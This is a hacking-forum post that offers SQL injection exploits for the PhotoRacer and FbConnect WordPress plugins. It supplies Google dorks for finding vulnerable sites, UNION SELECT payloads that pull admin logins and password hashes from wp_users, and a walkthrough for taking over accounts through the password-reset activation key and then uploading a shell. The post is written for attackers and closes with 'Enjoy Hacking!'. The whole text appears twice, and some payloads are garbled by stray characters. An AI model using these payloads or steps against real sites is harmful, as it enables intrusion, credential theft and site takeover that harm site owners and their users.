dEEpEst Posted November 6, 2016 Share Posted November 6, 2016 [HIDE-THANKS]### # Title : PhotoRacer & FbConnect SQL Injection Vulnerability # Type : SQL Injection Exploit # Security Risk : High ### ### # Google Dork 1 : # inurl:"wp-content/plugins/photoracer/viewimg.php?id=1 # Google Dork 2 : # inurl:"?fbconnect_action=myhome&userid=1 ### ### # Exploit 1 : /wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+1,2,3,4,5,concat(user_login,0x3a,us er_pass),7,8,9+from+wp_users-- # Exploit 2 : /?fbconnect_action=myhome&fbuserid=1+and+1=2+union+ select+1,2,3,4,5,concat(user_*login,0x3a,user_pass )***8203;***8203;,7,8,9,10,11,12+from+wp_users-- ### [~] Choose your target try to inject by using tools (Havij , Sql Poizon etc ) or Manualy ... [~] Once you find Data : User, E-mail, Password or Activation Key, you need to crack the MD5(Wordpress) Hash Example : $P$B4/7SILDqcoRQNvJiEgsAJW9midgZO0 = Administrator [~] If you cant crack the Hash try another way " Reset Admin Password " Example : http://www.yourtarget.com/wp-login.php?a...stpassword'>http://www.yourtarget.com/wp-login.php?a...stpassword [~] And paste the administrator E-mail and click "Get New Password" [~] Now inject again because you need to take the activication key, that will be like this Example : user_activation_key=1k34jcusHodi56edwkxA [~] Now reset the Admin password using activation key Example : http://www.yourtarget.com/wp-login.php?a...ogin=admin'>http://www.yourtarget.com/wp-login.php?a...ogin=admin [~] Set The New Password login upload shell or whatever you want thats all ... Enjoy Hacking ! ### # Title : PhotoRacer & FbConnect SQL Injection Vulnerability # Type : SQL Injection Exploit # Security Risk : High ### ### # Google Dork 1 : # inurl:"wp-content/plugins/photoracer/viewimg.php?id=1 # Google Dork 2 : # inurl:"?fbconnect_action=myhome&userid=1 ### ### # Exploit 1 : /wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+1,2,3,4,5,concat(user_login,0x3a,us er_pass),7,8,9+from+wp_users-- # Exploit 2 : /?fbconnect_action=myhome&fbuserid=1+and+1=2+union+ select+1,2,3,4,5,concat(user_*login,0x3a,user_pass )***8203;***8203;,7,8,9,10,11,12+from+wp_users-- ### [~] Choose your target try to inject by using tools (Havij , Sql Poizon etc ) or Manualy ... [~] Once you find Data : User, E-mail, Password or Activation Key, you need to crack the MD5(Wordpress) Hash Example : $P$B4/7SILDqcoRQNvJiEgsAJW9midgZO0 = Administrator [~] If you cant crack the Hash try another way " Reset Admin Password " Example : http://www.yourtarget.com/wp-login.php?a...stpassword [~] And paste the administrator E-mail and click "Get New Password" [~] Now inject again because you need to take the activication key, that will be like this Example : user_activation_key=1k34jcusHodi56edwkxA [~] Now reset the Admin password using activation key Example : http://www.yourtarget.com/wp-login.php?a...ogin=admin [~] Set The New Password login upload shell or whatever you want thats all ... Enjoy Hacking ![/HIDE-THANKS] Link to comment Share on other sites More sharing options...
Recommended Posts